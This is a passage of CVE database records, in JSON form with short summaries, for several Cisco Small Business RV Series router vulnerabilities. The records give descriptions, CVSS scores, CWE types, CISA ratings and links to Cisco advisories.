      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20827",
      datePublished: "2022-08-10T08:12:09.627719Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-11-01T18:54:50.122Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20841
Vulnerability from cvelistv5
Published
2022-08-10 08:10
Modified
2024-11-01 18:55
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:49.955Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220803 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20841",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "no",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-01T18:42:24.419568Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-01T18:55:49.093Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-08-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "HIGH",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 9,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-120",
                     description: "CWE-120",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-08-10T08:10:10",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220803 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
            },
         ],
         source: {
            advisory: "cisco-sa-sb-mult-vuln-CbVp4SUR",
            defect: [
               [
                  "CSCwb58268",
                  "CSCwb58273",
                  "CSCwb98961",
                  "CSCwb98964",
                  "CSCwc00210",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2022-08-03T23:00:00",
               ID: "CVE-2022-20841",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "9.8",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-120",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20220803 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-sb-mult-vuln-CbVp4SUR",
               defect: [
                  [
                     "CSCwb58268",
                     "CSCwb58273",
                     "CSCwb98961",
                     "CSCwb98964",
                     "CSCwc00210",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20841",
      datePublished: "2022-08-10T08:10:10.436095Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-11-01T18:55:49.093Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2021-1472
Vulnerability from cvelistv5
Published
2021-04-08 04:06
Modified
2024-11-08 17:50
Summary
Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T16:11:17.362Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20210407 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
               },
               {
                  name: "20210419 [CVE-2021-1472/CVE-2021-1473] Cisco RV Series Authentication Bypass and Remote Command Execution",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://seclists.org/fulldisclosure/2021/Apr/39",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2021-1472",
                        options: [
                           {
                              Exploitation: "poc",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "partial",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-08T17:50:19.661599Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-08T17:50:36.030Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2021-04-07T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  availabilityImpact: "NONE",
                  baseScore: 5.3,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "NONE",
                  integrityImpact: "LOW",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-119",
                     description: "CWE-119",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2021-04-20T17:06:24",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20210407 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
            },
            {
               name: "20210419 [CVE-2021-1472/CVE-2021-1473] Cisco RV Series Authentication Bypass and Remote Command Execution",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://seclists.org/fulldisclosure/2021/Apr/39",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html",
            },
         ],
         source: {
            advisory: "cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
            defect: [
               [
                  "CSCvw92538",
                  "CSCvw92718",
                  "CSCvw92723",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2021-04-07T16:00:00",
               ID: "CVE-2021-1472",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "7.3",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-119",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20210407 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
                  },
                  {
                     name: "20210419 [CVE-2021-1472/CVE-2021-1473] Cisco RV Series Authentication Bypass and Remote Command Execution",
                     refsource: "FULLDISC",
                     url: "http://seclists.org/fulldisclosure/2021/Apr/39",
                  },
                  {
                     name: "http://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html",
                     refsource: "MISC",
                     url: "http://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
               defect: [
                  [
                     "CSCvw92538",
                     "CSCvw92718",
                     "CSCvw92723",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2021-1472",
      datePublished: "2021-04-08T04:06:54.455590Z",
      dateReserved: "2020-11-13T00:00:00",
      dateUpdated: "2024-11-08T17:50:36.030Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2021-1251
Vulnerability from cvelistv5
Published
2021-04-08 04:05
Modified
2024-11-08 23:29
Summary
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T16:02:56.381Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2021-1251",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "no",
                           },
                           {
                              "Technical Impact": "partial",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-08T20:47:00.571527Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-08T23:29:59.228Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2021-04-07T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT_NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 7.4,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-119",
                     description: "CWE-119",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2021-04-08T04:05:20",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
            },
         ],
         source: {
            advisory: "cisco-sa-rv-multi-lldp-u7e4chCe",
            defect: [
               [
                  "CSCvw62392",
                  "CSCvw62395",
                  "CSCvw62410",
                  "CSCvw62411",
                  "CSCvw62413",
                  "CSCvw62416",
                  "CSCvw62417",
                  "CSCvw62418",
                  "CSCvw94339",
                  "CSCvw94341",
                  "CSCvw95016",
                  "CSCvw95017",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2021-04-07T16:00:00",
               ID: "CVE-2021-1251",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "8.8",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-119",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-rv-multi-lldp-u7e4chCe",
               defect: [
                  [
                     "CSCvw62392",
                     "CSCvw62395",
                     "CSCvw62410",
                     "CSCvw62411",
                     "CSCvw62413",
                     "CSCvw62416",
                     "CSCvw62417",
                     "CSCvw62418",
                     "CSCvw94339",
                     "CSCvw94341",
                     "CSCvw95016",
                     "CSCvw95017",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2021-1251",
      datePublished: "2021-04-08T04:05:20.167064Z",
      dateReserved: "2020-11-13T00:00:00",
      dateUpdated: "2024-11-08T23:29:59.228Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20702
Vulnerability from cvelistv5
Published
2022-02-10 17:06
Modified
2024-11-06 16:30
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:48.598Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-420/",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20702",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-06T16:02:58.165376Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-06T16:30:53.191Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-02-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-121",
                     description: "CWE-121",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-02-22T22:06:25",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-420/",
            },
         ],
         source: {
            advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
            defect: [
               [
                  "CSCvz88279",
                  "CSCvz94704",
                  "CSCwa12732",
                  "CSCwa12748",
                  "CSCwa12836",
                  "CSCwa13115",
                  "CSCwa13119",
                  "CSCwa13205",
                  "CSCwa13682",
                  "CSCwa13836",
                  "CSCwa13882",
                  "CSCwa13888",
                  "CSCwa13900",
                  "CSCwa14007",
                  "CSCwa14008",
                  "CSCwa14564",
                  "CSCwa14565",
                  "CSCwa14601",
                  "CSCwa14602",
                  "CSCwa15167",
                  "CSCwa15168",
                  "CSCwa18769",
                  "CSCwa18770",
                  "CSCwa32432",
                  "CSCwa36774",
                  "CSCwa54598",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2022-02-03T00:00:00",
               ID: "CVE-2022-20702",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "10.0",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-121",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
                  },
                  {
                     name: "https://www.zerodayinitiative.com/advisories/ZDI-22-420/",
                     refsource: "MISC",
                     url: "https://www.zerodayinitiative.com/advisories/ZDI-22-420/",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
               defect: [
                  [
                     "CSCvz88279",
                     "CSCvz94704",
                     "CSCwa12732",
                     "CSCwa12748",
                     "CSCwa12836",
                     "CSCwa13115",
                     "CSCwa13119",
                     "CSCwa13205",
                     "CSCwa13682",
                     "CSCwa13836",
                     "CSCwa13882",
                     "CSCwa13888",
                     "CSCwa13900",
                     "CSCwa14007",
                     "CSCwa14008",
                     "CSCwa14564",
                     "CSCwa14565",
                     "CSCwa14601",
                     "CSCwa14602",
                     "CSCwa15167",
                     "CSCwa15168",
                     "CSCwa18769",
                     "CSCwa18770",
                     "CSCwa32432",
                     "CSCwa36774",
                     "CSCwa54598",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20702",
      datePublished: "2022-02-10T17:06:31.695747Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-11-06T16:30:53.191Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2021-1308
Vulnerability from cvelistv5
Published
2021-04-08 04:05
Modified
2024-11-08 23:29
Summary
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T16:02:56.452Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
